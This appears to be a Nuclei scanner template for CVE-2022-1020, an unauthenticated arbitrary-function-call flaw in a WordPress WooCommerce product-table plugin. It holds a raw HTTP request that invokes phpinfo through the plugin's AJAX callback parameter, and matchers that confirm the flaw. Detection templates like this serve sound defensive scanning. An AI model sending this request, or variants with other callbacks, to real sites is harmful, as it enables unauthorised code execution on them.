id: CVE-2022-1020 info: name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call author: Akincibor severity: critical description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument. impact: | It allows remote code execution on the affected system. remediation: | Update WordPress WooCommerce plugin to version 3.1.2 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5 - https://nvd.nist.gov/vuln/detail/CVE-2022-1020 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1020 cwe-id: CWE-352 epss-score: 0.01434 epss-percentile: 0.85073 cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: codeastrology product: woo_product_table framework: wordpress tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth,codeastrology http: - raw: - | POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded option_key=a&perpose=update&callback=phpinfo matchers-condition: and matchers: - type: word words: - "PHP Extension" - "PHP Version" condition: and - type: status status: - 200 extractors: - type: regex group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' part: body # digest: 4b0a00483046022100f4f790741352bf93a4789314806ac70a36ce322f683956d75d3f0d0efefa79510221008f88a633700189b9cc7726ca0f8d31fac9423a00330a1dc495e5b8eef21702b8:922c64590222798bb761d5b6d8e72950